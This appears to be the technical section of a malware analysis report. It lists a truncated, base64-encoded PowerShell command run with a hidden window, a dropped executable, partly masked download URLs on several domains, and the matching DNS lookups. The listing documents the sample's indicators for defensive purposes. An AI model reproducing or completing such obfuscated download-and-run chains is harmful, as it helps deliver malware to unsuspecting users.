Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF...
- %HOMEPATH%\774.exe
- http://cr###ectric.com/ay1fti/Bx/
- http://mi####alqasim.com/oldSite/pXf0117/
- http://www.wo####leetbd.com/websiteguide/pnGM26908/
- http://se####typoint.com/news/eOjV/
- http://tr######rantydelivery.com/wp-admin/FtTdAQ/
- http://tr######rantydelivery.com/cgi-sys/suspendedpage.cgi
- DNS ASK cr###ectric.com
- DNS ASK mi####alqasim.com
- DNS ASK wo####leetbd.com
- DNS ASK se####typoint.com
- DNS ASK tr######rantydelivery.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF...' (with hidden window)